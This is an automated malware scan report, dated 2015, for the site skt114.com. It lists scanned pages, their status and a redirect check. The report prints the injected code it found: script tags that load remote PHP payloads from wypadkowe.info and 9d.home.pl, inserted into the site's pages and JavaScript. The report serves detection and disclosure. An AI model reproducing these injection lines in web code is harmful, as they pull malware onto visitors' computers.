Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=skt114.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://skt114.com/ | 200 OK Content-Length: 6740 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://wypadkowe.info/tbcmdfmz.php?id=45824756"></script> | ||
http://skt114.com/css_js/java.js | 200 OK Content-Length: 3696 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i ) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j ].src=a[i];}} } function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i ) x.src=x.oSrc; } function MM_findObj(n, d) { var p,i,x; if(!d) d=doc "</object>"; document.write(flashStr1); } function bluring(){ if(event.srcElement.tagName=="A"||event.srcElement.tagName=="IMG") document.body.focus(); } document.onfocusin=bluring; document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://9d.home.pl/pub/pOFBT2NP.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://skt114.com/board/qna.htm | 200 OK Content-Length: 4779 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://wypadkowe.info/tbcmdfmz.php?id=45824794"></script> | ||
http://skt114.com/board/../css_js/java.js | 200 OK Content-Length: 3696 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i ) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j ].src=a[i];}} } function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i ) x.src=x.oSrc; } function MM_findObj(n, d) { var p,i,x; if(!d) d=doc "</object>"; document.write(flashStr1); } function bluring(){ if(event.srcElement.tagName=="A"||event.srcElement.tagName=="IMG") document.body.focus(); } document.onfocusin=bluring; document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://9d.home.pl/pub/pOFBT2NP.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://skt114.com/test404page.js | 404 Not Found Content-Length: 287 Content-Type: text/html | clean |
http://skt114.com/online/03.htm | 200 OK Content-Length: 15641 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://wypadkowe.info/tbcmdfmz.php?id=45824794"></script> | ||
http://skt114.com/online/../css_js/java.js | 200 OK Content-Length: 3696 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i ) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j ].src=a[i];}} } function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i ) x.src=x.oSrc; } function MM_findObj(n, d) { var p,i,x; if(!d) d=doc "</object>"; document.write(flashStr1); } function bluring(){ if(event.srcElement.tagName=="A"||event.srcElement.tagName=="IMG") document.body.focus(); } document.onfocusin=bluring; document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://9d.home.pl/pub/pOFBT2NP.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://skt114.com/online/../bbs/_template/admin/default/member_fun.js | 200 OK Content-Length: 10834 Content-Type: application/x-javascript | clean |
http://skt114.com/online/01.htm | 200 OK Content-Length: 11370 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://wypadkowe.info/tbcmdfmz.php?id=45824794"></script> | ||
http://skt114.com/online/02.htm | 200 OK Content-Length: 122754 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://wypadkowe.info/tbcmdfmz.php?id=45824794"></script> | ||
http://skt114.com/number_data/070_form.xls | 200 OK Content-Length: 30208 Content-Type: application/vnd.ms-excel | clean |
http://skt114.com/number_data/1599_form.doc | 200 OK Content-Length: 60416 Content-Type: application/msword | clean |
http://skt114.com/number_data/internet_form.xls | 200 OK Content-Length: 12765 Content-Type: application/vnd.ms-excel | clean |
http://skt114.com/online/ | 403 Forbidden Content-Length: 284 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: skt114.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 27 Feb 2015 13:46:13 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 6740
Content-Type: text/html; charset=EUC-KR
Set-Cookie: cookie_referer=596fb162acdadbf44a9517d83d4fdfc5; path=/
X-Powered-By: PHP/4.4.9
...6740 bytes of data.
GET / HTTP/1.1
Host: skt114.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 27 Feb 2015 13:46:13 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 6740
Content-Type: text/html; charset=EUC-KR
Set-Cookie: cookie_referer=596fb162acdadbf44a9517d83d4fdfc5; path=/
X-Powered-By: PHP/4.4.9
...6740 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: skt114.com
Referer: http://www.google.com/search?q=skt114.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: skt114.com
Referer: http://www.google.com/search?q=skt114.com
Result:
The result is similar to the first query. There are no suspicious redirects found.